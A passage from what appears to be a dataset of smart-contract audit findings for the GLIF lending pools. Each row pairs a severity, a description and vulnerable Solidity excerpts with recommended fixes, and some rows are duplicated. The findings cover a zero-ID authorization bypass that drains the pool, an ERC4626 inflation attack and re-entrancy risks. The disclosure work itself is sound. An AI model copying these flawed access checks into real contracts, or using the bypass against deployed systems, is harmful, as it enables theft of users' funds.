to the code whose only purpose is to make it easier to test. This might cause unexpected behavior if deployed in production. For instance, `onlyTest` and `setTimeExtra` should be removed from the code before deployment, as well as `timeExtra` in `getCurrentWeek` and `getNow`.\\n```\\nmodifier onlyTest() {\\n```\\n\\n```\\nfunction setTimeExtra(uint256 timeExtra\\_) external onlyTest {\\n```\\n\\n```\\nfunction getCurrentWeek() public view returns(uint256) {\\n return (block.timestamp + TIME\\_OFFSET + timeExtra) / (7 days);\\n}\\n```\\n\\n```\\nfunction getNow() public view returns(uint256) {\\n return block.timestamp + timeExtra;\\n}\\n```\\n","For the long term, consider mimicking this behavior by using features offered by your testing framework.",,```\\nmodifier onlyTest() {\\n```\\n +Missing Events,low,Some state-changing functions do not emit an event at all or omit relevant information.\\nA. `Pool.setEventAggregator` should emit an event with the value of `eventAggregator_` so that off-chain services will be notified and can automatically adjust.\\n```\\nfunction setEventAggregator(address eventAggregator\\_) external onlyPoolManager {\\n eventAggregator = eventAggregator\\_;\\n}\\n```\\n\\nB. `Pool.enablePool` should emit an event when the pool is dis- or enabled.\\n```\\nfunction enablePool(bool enabled\\_) external onlyPoolManager {\\n enabled = enabled\\_;\\n}\\n```\\n\\nC. `Pool.execute` only logs the `requestIndex_` while it should also include the `operation` and `data` to better reflect the state change in the transaction.\\n```\\nif (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).execute(\\n requestIndex\\_\\n );\\n}\\n```\\n,State-changing functions should emit an event to have an audit trail and enable monitoring of smart contract usage.,,```\\nfunction setEventAggregator(address eventAggregator\\_) external onlyPoolManager {\\n eventAggregator = eventAggregator\\_;\\n}\\n```\\n +InfinityPool contract authorization bypass attack,high,"An attacker could create their own credential and set the `Agent` ID to `0`, which would bypass the `subjectIsAgentCaller` modifier. The attacker could use this attack to `borrow` funds from the pool, draining any available liquidity. For example, only an `Agent` should be able to `borrow` funds from the pool and call the `borrow` function:\\n```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n\\nThe following modifier checks that the caller is an Agent:\\n```\\nmodifier subjectIsAgentCaller(VerifiableCredential memory vc) {\\n if (\\n GetRoute.agentFactory(router).agents(msg.sender) != vc.subject\\n ) revert Unauthorized();\\n \\_;\\n}\\n```\\n\\nBut if the caller is not an `Agent`, the `GetRoute.agentFactory(router).agents(msg.sender)` will return `0`. And if the `vc.subject` is also zero, the check will be successful with any `msg.sender`. The attacker can also pass an arbitrary `vc.value` as the parameter and steal all the funds from the pool.",Ensure only an `Agent` can call `borrow` and pass the `subjectIsAgentCaller` modifier.,,"```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n" +Wrong accounting for totalBorrowed in the InfinityPool.writeOff function,high,"Here is a part of the `InfinityPool.writeOff` function:\\n```\\n// transfer the assets into the pool\\n// whatever we couldn't pay back\\nuint256 lostAmt = principalOwed > recoveredFunds ? principalOwed - recoveredFunds : 0;\\n\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n```\\n\\nThe `totalBorrowed` is decreased by the `lostAmt` value. Instead, it should be decreased by the original `account.principal` value to acknowledge the loss.",Resolution\\nFixed.,,"```\\n// transfer the assets into the pool\\n// whatever we couldn't pay back\\nuint256 lostAmt = principalOwed > recoveredFunds ? principalOwed - recoveredFunds : 0;\\n\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n```\\n" +The beneficiaryWithdrawable function can be called by anyone,high,"The `beneficiaryWithdrawable` function is supposed to be called by the Agent when a beneficiary is trying to withdraw funds:\\n```\\nfunction beneficiaryWithdrawable(\\n address recipient,\\n address sender,\\n uint256 agentID,\\n uint256 proposedAmount\\n) external returns (\\n uint256 amount\\n) {\\n AgentBeneficiary memory beneficiary = \\_agentBeneficiaries[agentID];\\n address benneficiaryAddress = beneficiary.active.beneficiary;\\n // If the sender is not the owner of the Agent or the beneficiary, revert\\n if(\\n !(benneficiaryAddress == sender || (IAuth(msg.sender).owner() == sender && recipient == benneficiaryAddress) )) {\\n revert Unauthorized();\\n }\\n (\\n beneficiary,\\n amount\\n ) = beneficiary.withdraw(proposedAmount);\\n // update the beneficiary in storage\\n \\_agentBeneficiaries[agentID] = beneficiary;\\n}\\n```\\n\\nThis function reduces the quota that is supposed to be transferred during the `withdraw` call:\\n```\\n sendAmount = agentPolice.beneficiaryWithdrawable(receiver, msg.sender, id, sendAmount);\\n}\\nelse if (msg.sender != owner()) {\\n revert Unauthorized();\\n}\\n\\n// unwrap any wfil needed to withdraw\\n\\_poolFundsInFIL(sendAmount);\\n// transfer funds\\npayable(receiver).sendValue(sendAmount);\\n```\\n\\nThe issue is that anyone can call this function directly, and the quota will be reduced without funds being transferred.",Ensure only the Agent can call this function.,,"```\\nfunction beneficiaryWithdrawable(\\n address recipient,\\n address sender,\\n uint256 agentID,\\n uint256 proposedAmount\\n) external returns (\\n uint256 amount\\n) {\\n AgentBeneficiary memory beneficiary = \\_agentBeneficiaries[agentID];\\n address benneficiaryAddress = beneficiary.active.beneficiary;\\n // If the sender is not the owner of the Agent or the beneficiary, revert\\n if(\\n !(benneficiaryAddress == sender || (IAuth(msg.sender).owner() == sender && recipient == benneficiaryAddress) )) {\\n revert Unauthorized();\\n }\\n (\\n beneficiary,\\n amount\\n ) = beneficiary.withdraw(proposedAmount);\\n // update the beneficiary in storage\\n \\_agentBeneficiaries[agentID] = beneficiary;\\n}\\n```\\n" +An Agent can borrow even with existing debt in interest payments,medium,"To `borrow` funds, an `Agent` has to call the `borrow` function of the pool:\\n```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n\\nLet's assume that the `Agent` already had some funds borrowed. During this function execution, the current debt status is not checked. The principal debt increases after borrowing, but `account.epochsPaid` remains the same. So the pending debt will instantly increase as if the borrowing happened on `account.epochsPaid`.",Ensure the debt is paid when borrowing more funds.,,"```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n" +The AgentPolice.distributeLiquidatedFunds() function can have undistributed residual funds,medium,"When an Agent is liquidated, the liquidator (owner of the protocol) is supposed to try to redeem as many funds as possible and re-distribute them to the pools:\\n```\\nfunction distributeLiquidatedFunds(uint256 agentID, uint256 amount) external {\\n if (!liquidated[agentID]) revert Unauthorized();\\n\\n // transfer the assets into the pool\\n GetRoute.wFIL(router).transferFrom(msg.sender, address(this), amount);\\n \\_writeOffPools(agentID, amount);\\n}\\n```\\n\\nThe problem is that in the pool, it's accounted that the amount of funds can be larger than the debt. In that case, the pool won't transfer more funds than the pool needs:\\n```\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n\\nemit WriteOff(agentID, recoveredFunds, lostAmt, interestPaid);\\n```\\n\\nIf that happens, the remaining funds will be stuck in the `AgentPolice` contract.",Return the residual funds to the Agent's owner or process them in some way so they are not lost.,,"```\\nfunction distributeLiquidatedFunds(uint256 agentID, uint256 amount) external {\\n if (!liquidated[agentID]) revert Unauthorized();\\n\\n // transfer the assets into the pool\\n GetRoute.wFIL(router).transferFrom(msg.sender, address(this), amount);\\n \\_writeOffPools(agentID, amount);\\n}\\n```\\n" +An Agent can be upgraded even if there is no new implementation,medium,"Agents can be upgraded to a new implementation, and only the Agent's owner can call the upgrade function:\\n```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n\\nThe issue is that the owner can trigger the upgrade even if no new implementation exists. Multiple possible problems derive from it.\\nUpgrading to the current implementation of the Agent will break the logic because the current version is not calling the `migrateMiner` function, so all the miners will stay with the old Agent, and their funds will be lost.\\nThe owner can accidentally trigger multiple upgrades simultaneously, leading to a loss of funds (https://github.com/ConsenSysDiligence/glif-audit-2023-04/issues/2).\\nThe owner also has no control over the new version of the Agent. To increase decentralization, it's better to pass the deployer's address as a parameter additionally.","Ensure the upgrades can only happen when there is a new version of an Agent, and the owner controls this version.",,"```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n" +Potential re-entrancy issues when upgrading the contracts,low,"The protocol doesn't have any built-in re-entrancy protection mechanisms. That mainly explains by using the `wFIL` token, which is not supposed to give that opportunity. And also by carefully using `FIL` transfers.\\nHowever, there are some places in the code where things may go wrong in the future. For example, when upgrading an Agent:\\n```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n\\nHere, we see the `oldAgent.decommissionAgent(newAgent);` call happens before the `oldAgent` is deleted. Inside this function, we see:\\n```\\nfunction decommissionAgent(address \\_newAgent) external {\\n // only the agent factory can decommission an agent\\n AuthController.onlyAgentFactory(router, msg.sender);\\n // if the newAgent has a mismatching ID, revert\\n if(IAgent(\\_newAgent).id() != id) revert Unauthorized();\\n // set the newAgent in storage, which marks the upgrade process as starting\\n newAgent = \\_newAgent;\\n uint256 \\_liquidAssets = liquidAssets();\\n // Withdraw all liquid funds from the Agent to the newAgent\\n \\_poolFundsInFIL(\\_liquidAssets);\\n // transfer funds to new agent\\n payable(\\_newAgent).sendValue(\\_liquidAssets);\\n}\\n```\\n\\nHere, the FIL is transferred to a new contract which is currently unimplemented and unknown. Potentially, the fallback function of this contract could trigger a re-entrancy attack. If that's the case, during the execution of this function, there will be two contracts that are active agents with the same ID, and the attacker can try to use that maliciously.","Be very cautious with further implementations of agents and pools. Also, consider using reentrancy protection in public functions.",,"```\\nfunction upgradeAgent(\\n address agent\\n) external returns (address newAgent) {\\n IAgent oldAgent = IAgent(agent);\\n address owner = IAuth(address(oldAgent)).owner();\\n uint256 agentId = agents[agent];\\n // only the Agent's owner can upgrade, and only a registered agent can be upgraded\\n if (owner != msg.sender || agentId == 0) revert Unauthorized();\\n // deploy a new instance of Agent with the same ID and auth\\n newAgent = GetRoute.agentDeployer(router).deploy(\\n router,\\n agentId,\\n owner,\\n IAuth(address(oldAgent)).operator()\\n );\\n // Register the new agent and unregister the old agent\\n agents[newAgent] = agentId;\\n // transfer funds from old agent to new agent and mark old agent as decommissioning\\n oldAgent.decommissionAgent(newAgent);\\n // delete the old agent from the registry\\n agents[agent] = 0;\\n}\\n```\\n" +InfinityPool is subject to a donation with inflation attack if emtied.,low,"Since `InfinityPool` is an implementation of the ERC4626 vault, it is too susceptible to inflation attacks. An attacker could front-run the first deposit and inflate the share price to an extent where the following deposit will be less than the value of 1 wei of share resulting in 0 shares minted. The attacker could conduct the inflation by means of self-destructing of another contract. In the case of GLIF this attack is less likely on the first pool since GLIF team accepts predeposits so some amount of shares was already minted. We do suggest fixing this issue before the next pool is deployed and no pre-stake is generated.\\n```\\n/\\*//////////////////////////////////////////////////////////////\\n 4626 LOGIC\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/\\*\\*\\n \\* @dev Converts `assets` to shares\\n \\* @param assets The amount of assets to convert\\n \\* @return shares - The amount of shares converted from assets\\n \\*/\\nfunction convertToShares(uint256 assets) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets \\* supply / totalAssets();\\n}\\n\\n/\\*\\*\\n \\* @dev Converts `shares` to assets\\n \\* @param shares The amount of shares to convert\\n \\* @return assets - The amount of assets converted from shares\\n \\*/\\nfunction convertToAssets(uint256 shares) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares \\* totalAssets() / supply;\\n}\\n```\\n","Since the pool does not need to accept donations, the easiest way to handle this case is to use virtual price, where the balance of the contract is duplicated in a separate variable.",,```\\n/\\*//////////////////////////////////////////////////////////////\\n 4626 LOGIC\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/\\*\\*\\n \\* @dev Converts `assets` to shares\\n \\* @param assets The amount of assets to convert\\n \\* @return shares - The amount of shares converted from assets\\n \\*/\\nfunction convertToShares(uint256 assets) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets \\* supply / totalAssets();\\n}\\n\\n/\\*\\*\\n \\* @dev Converts `shares` to assets\\n \\* @param shares The amount of shares to convert\\n \\* @return assets - The amount of assets converted from shares\\n \\*/\\nfunction convertToAssets(uint256 shares) public view returns (uint256) {\\n uint256 supply = liquidStakingToken.totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares \\* totalAssets() / supply;\\n}\\n```\\n +MaxWithdraw should potentially account for the funds available in the ramp.,low,"Since `InfinityPool` is ERC4626 it should also support the `MaxWithdraw` method. According to the EIP it should include any withdrawal limitation that the participant could encounter. At the moment the `MaxWithdraw` function returns the maximum amount of IOU tokens rather than WFIL. Since IOU token is not the `asset` token of the vault, this behavior is not ideal.\\n```\\nfunction maxWithdraw(address owner) public view returns (uint256) {\\n return convertToAssets(liquidStakingToken.balanceOf(owner));\\n}\\n```\\n",We suggest considering returning the maximum amount of WFIL withdrawal which should account for Ramp balance.,,```\\nfunction maxWithdraw(address owner) public view returns (uint256) {\\n return convertToAssets(liquidStakingToken.balanceOf(owner));\\n}\\n```\\n +"The upgradeability of MinerRegistry, AgentPolice, and Agent is overcomplicated and has a hight chance of errors. Acknowledged",low,"During the engagement, we have identified a few places that signify that the `Agent`, `MinerRegistry` and `AgentPolice` can be upgraded, for example:\\nAbility to migrate the miner from one version of the Agent to another inside the `migrateMiner`.\\nAbility to `refreshRoutes` that would update the `AgentPolice` and `MinerRegistry` addresses for a given Agent.\\nAbility to `decommission` pool. We believe that this functionality is present it is not very well thought through. For example, both `MinerRegistry` and `AgentPolice` are not upgradable but have mappings inside of them.\\n```\\nmapping(uint256 => bool) public liquidated;\\n\\n/// @notice `\\_poolIDs` maps agentID to the pools they have actively borrowed from\\nmapping(uint256 => uint256[]) private \\_poolIDs;\\n\\n/// @notice `\\_credentialUseBlock` maps signature bytes to when a credential was used\\nmapping(bytes32 => uint256) private \\_credentialUseBlock;\\n\\n/// @notice `\\_agentBeneficiaries` maps an Agent ID to its Beneficiary struct\\nmapping(uint256 => AgentBeneficiary) private \\_agentBeneficiaries;\\n```\\n\\n```\\nmapping(bytes32 => bool) private \\_minerRegistered;\\n\\nmapping(uint256 => uint64[]) private \\_minersByAgent;\\n```\\n\\nThat means that any time these contracts would need to be upgraded, the contents of those mappings will need to be somehow recreated in the new contract. That is not trivial since it is not easy to obtain all values of a mapping. This will also require an additional protocol-controlled setter ala kickstart mapping functions that are not ideal.\\nIn the case of `Agent` if the contract was upgradable there would be no need for a process of migrating miners that can be tedious and opens possibilities for errors. Since protocol has a lot of centralization and trust assumptions already, having upgradability will not contribute to it a lot.\\nWe also believe that during the upgrade of the pool, the PoolToken will stay the same in the new pool. That means that the minting and burning permissions of the share tokens have to be carefully updated or checked in a manner that does not require the address of the pool to be constant. Since we did not have access to this file, we can not check if that is done correctly.",Consider using upgradable contracts or have a solid upgrade plan that is well-tested before an emergency situation occurs.,,```\\nmapping(uint256 => bool) public liquidated;\\n\\n/// @notice `\\_poolIDs` maps agentID to the pools they have actively borrowed from\\nmapping(uint256 => uint256[]) private \\_poolIDs;\\n\\n/// @notice `\\_credentialUseBlock` maps signature bytes to when a credential was used\\nmapping(bytes32 => uint256) private \\_credentialUseBlock;\\n\\n/// @notice `\\_agentBeneficiaries` maps an Agent ID to its Beneficiary struct\\nmapping(uint256 => AgentBeneficiary) private \\_agentBeneficiaries;\\n```\\n +Mint function in the Infinity pool will emit the incorrect value.,low,"In the `InifinityPool` file the `mint` function recomputes the amount of the assets before emitting the event. While this is fine in a lot of cases, that will not always be true. The result of `previewMint` and `convertToAssets` will only be equal while the `totalAssets` and `totalSupply` are equal. For example, this assumption will break after the first liquidation.\\n```\\nfunction mint(uint256 shares, address receiver) public isOpen returns (uint256 assets) {\\n if(shares == 0) revert InvalidParams();\\n // These transfers need to happen before the mint, and this is forcing a higher degree of coupling than is ideal\\n assets = previewMint(shares);\\n asset.transferFrom(msg.sender, address(this), assets);\\n liquidStakingToken.mint(receiver, shares);\\n assets = convertToAssets(shares);\\n emit Deposit(msg.sender, receiver, assets, shares);\\n}\\n```\\n",Use the `assets` value computed by the `previewMint` when emitting the event.,,"```\\nfunction mint(uint256 shares, address receiver) public isOpen returns (uint256 assets) {\\n if(shares == 0) revert InvalidParams();\\n // These transfers need to happen before the mint, and this is forcing a higher degree of coupling than is ideal\\n assets = previewMint(shares);\\n asset.transferFrom(msg.sender, address(this), assets);\\n liquidStakingToken.mint(receiver, shares);\\n assets = convertToAssets(shares);\\n emit Deposit(msg.sender, receiver, assets, shares);\\n}\\n```\\n" +Potential overpayment due to rounding imprecision Won't Fix,low,"Inside the `InifintyPool` the `pay` function might accept unaccounted files. Imagine a situation where an Agent is trying to repay only the fees portion of the debt. In that case, the following branch will be executed:\\n```\\nif (vc.value <= interestOwed) {\\n // compute the amount of epochs this payment covers\\n // vc.value is not WAD yet, so divWadDown cancels the extra WAD in interestPerEpoch\\n uint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n // update the account's `epochsPaid` cursor\\n account.epochsPaid += epochsForward;\\n // since the entire payment is interest, the entire payment is used to compute the fee (principal payments are fee-free)\\n feeBasis = vc.value;\\n} else {\\n```\\n\\nThe issue is if the `value` does not divide by the `interestPerEpoch` exactly, any remainder will remain in the InfinityPool.\\n```\\nuint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n```\\n","Since the remainder will most likely not be too large this is not critical, but ideally, those remaining funds would be included in the `refund` variable.",,"```\\nif (vc.value <= interestOwed) {\\n // compute the amount of epochs this payment covers\\n // vc.value is not WAD yet, so divWadDown cancels the extra WAD in interestPerEpoch\\n uint256 epochsForward = vc.value.divWadDown(interestPerEpoch);\\n // update the account's `epochsPaid` cursor\\n account.epochsPaid += epochsForward;\\n // since the entire payment is interest, the entire payment is used to compute the fee (principal payments are fee-free)\\n feeBasis = vc.value;\\n} else {\\n```\\n" +jumpStartAccount should be subject to the same approval checks as regular borrow.,low,"`InfinityPool` contract has the ability to kick start an account that will have a debt position in this pool.\\n```\\nfunction jumpStartAccount(address receiver, uint256 agentID, uint256 accountPrincipal) external onlyOwner {\\n Account memory account = \\_getAccount(agentID);\\n // if the account is already initialized, revert\\n if (account.principal != 0) revert InvalidState();\\n // create the account\\n account.principal = accountPrincipal;\\n account.startEpoch = block.number;\\n account.epochsPaid = block.number;\\n // save the account\\n account.save(router, agentID, id);\\n // add the pool to the agent's list of borrowed pools\\n GetRoute.agentPolice(router).addPoolToList(agentID, id);\\n // mint the iFIL to the receiver, using principal as the deposit amount\\n liquidStakingToken.mint(receiver, convertToShares(accountPrincipal));\\n // account for the new principal in the total borrowed of the pool\\n totalBorrowed += accountPrincipal;\\n}\\n```\\n","We suggest that this action is subject to the same rules as the standard borrow action. Thus checks on DTE, LTV and DTI should be done if possible.",,"```\\nfunction jumpStartAccount(address receiver, uint256 agentID, uint256 accountPrincipal) external onlyOwner {\\n Account memory account = \\_getAccount(agentID);\\n // if the account is already initialized, revert\\n if (account.principal != 0) revert InvalidState();\\n // create the account\\n account.principal = accountPrincipal;\\n account.startEpoch = block.number;\\n account.epochsPaid = block.number;\\n // save the account\\n account.save(router, agentID, id);\\n // add the pool to the agent's list of borrowed pools\\n GetRoute.agentPolice(router).addPoolToList(agentID, id);\\n // mint the iFIL to the receiver, using principal as the deposit amount\\n liquidStakingToken.mint(receiver, convertToShares(accountPrincipal));\\n // account for the new principal in the total borrowed of the pool\\n totalBorrowed += accountPrincipal;\\n}\\n```\\n" +InfinityPool Contract Authorization Bypass Attack,high,"An attacker could create their own credential and set the `Agent` ID to `0`, which would bypass the `subjectIsAgentCaller` modifier. The attacker could use this attack to `borrow` funds from the pool, draining any available liquidity. For example, only an `Agent` should be able to `borrow` funds from the pool and call the `borrow` function:\\n```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n\\nThe following modifier checks that the caller is an Agent:\\n```\\nmodifier subjectIsAgentCaller(VerifiableCredential memory vc) {\\n if (\\n GetRoute.agentFactory(router).agents(msg.sender) != vc.subject\\n ) revert Unauthorized();\\n \\_;\\n}\\n```\\n\\nBut if the caller is not an `Agent`, the `GetRoute.agentFactory(router).agents(msg.sender)` will return `0`. And if the `vc.subject` is also zero, the check will be successful with any `msg.sender`. The attacker can also pass an arbitrary `vc.value` as the parameter and steal all the funds from the pool.",Ensure only an `Agent` can call `borrow` and pass the `subjectIsAgentCaller` modifier.,,"```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n" +Wrong Accounting for totalBorrowed in the InfinityPool.writeOff Function,high,"Here is a part of the `InfinityPool.writeOff` function:\\n```\\n// transfer the assets into the pool\\n// whatever we couldn't pay back\\nuint256 lostAmt = principalOwed > recoveredFunds ? principalOwed - recoveredFunds : 0;\\n\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n```\\n\\nThe `totalBorrowed` is decreased by the `lostAmt` value. Instead, it should be decreased by the original `account.principal` value to acknowledge the loss.",Resolution\\nFixed.,,"```\\n// transfer the assets into the pool\\n// whatever we couldn't pay back\\nuint256 lostAmt = principalOwed > recoveredFunds ? principalOwed - recoveredFunds : 0;\\n\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n```\\n" +The beneficiaryWithdrawable Function Can Be Called by Anyone,high,"The `beneficiaryWithdrawable` function is supposed to be called by the Agent when a beneficiary is trying to withdraw funds:\\n```\\nfunction beneficiaryWithdrawable(\\n address recipient,\\n address 